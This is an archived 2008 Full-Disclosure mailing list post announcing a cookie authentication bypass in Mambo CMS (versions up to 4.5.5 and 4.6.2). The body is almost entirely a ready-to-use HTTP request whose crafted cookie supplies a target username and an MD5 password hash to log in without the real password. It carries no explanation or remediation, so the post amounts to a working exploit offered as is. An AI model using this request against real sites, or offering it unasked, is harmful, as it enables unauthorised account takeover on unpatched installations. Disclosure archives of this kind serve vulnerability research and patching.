lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <30f9e93f0806080429i4a68cd19q3a73192dc00be5a7@mail.gmail.com> Date: Sun, 8 Jun 2008 13:29:56 +0200 From: "Halabaluza Team Halabaluza Team" <halabaluza.team@...il.com> To: halabaluza.team@...il.com Subject: Mambo Cookie Authentication Bypass Exploit for mambo <= 4.5.5 and <= 4.6.2 maybe others GET http://[TARGET]/index.php Host: [TARGET] User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Connection: keep-alive Cookie: usercookie[username]=[USERNAME];usercookie[password]=[MD5] Cache-Control: max-age=0 FREE TIBET! _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists